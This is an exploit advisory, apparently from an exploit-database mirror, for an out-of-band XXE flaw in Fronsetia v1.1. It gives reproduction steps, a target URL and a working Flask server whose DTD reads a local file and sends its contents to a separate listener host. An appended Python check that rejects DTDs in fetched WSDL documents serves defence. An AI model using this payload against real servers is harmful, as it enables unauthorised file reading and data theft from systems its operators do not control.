## https://sploitus.com/exploit?id=PACKETSTORM:182763
# Exploit Title: XXE OOB - Fronsetia v1.1  
# Date: 11/2024  
# Exploit Author: Andrey Stoykov  
# Version: 1.1  
# Tested on: Debian 12  
# Blog:  
https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.html  
  
XXE OOB  
  
Description:  
  
- It was found that the application was vulnerable to XXE (XML External Entity Injection)  
  
Steps to Reproduce:  
  
1. Add Python3 server to serve malicious XXE payload  
2. Add a file on the file system to be read via the application XXE payload  
echo 123123 > /tmp/123  
3. Enter the following URL as input  
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl  
  
// Python Server Code  
  
from flask import Flask, Response, request
import logging

app = Flask(__name__)

# Set up logging
logging.basicConfig(level=logging.DEBUG)

# Returns the XML document served for the WSDL URL entered in step 3
@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
    app.logger.debug("Serving XXE payload")
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)

# Returns the external DTD referenced by the document above
@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
    app.logger.debug("DTD requested")
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">
%eval;
%exfil;"""
    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
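
A defensive check for the issue described above, as an added example that is not part of the original advisory or of the Fronsetia code base: it refuses any fetched WSDL that carries a DOCTYPE or entity declaration before the document is handed to the application's own parser. The names `check_wsdl` and `RejectedWsdl` and both sample documents are assumptions constructed for illustration.

```python
from xml.parsers import expat


class RejectedWsdl(ValueError):
    """The fetched document must not be passed on to the WSDL parser."""


def check_wsdl(document: bytes) -> str:
    """Return the root element name, or raise RejectedWsdl.

    A WSDL never needs a DTD, so any DOCTYPE, entity declaration or
    external entity reference is treated as hostile input.
    """
    parser = expat.ParserCreate()
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise RejectedWsdl(f"DOCTYPE declaration not allowed (root {name!r})")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise RejectedWsdl(f"entity declaration not allowed ({name!r})")

    def on_external_ref(context, base, sysid, pubid):
        raise RejectedWsdl(f"external entity reference not allowed ({sysid!r})")

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(document, True)  # exceptions raised in handlers propagate
    except expat.ExpatError as exc:
        raise RejectedWsdl(f"not well-formed XML: {exc}") from exc
    return root[0]


# Constructed samples: a minimal WSDL, and a document with the same shape as
# the one served in the advisory (hostname is a placeholder).
BENIGN_WSDL = (b'<?xml version="1.0"?><definitions '
               b'xmlns="http://schemas.xmlsoap.org/wsdl/" name="testxxeService"/>')
DTD_WSDL = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://dtd.example.invalid/data.dtd"> %dtd;
]>
<data/>"""
```

The check is a pre-filter only; the parser that finally consumes the WSDL should still have DTD processing and external entity resolution disabled.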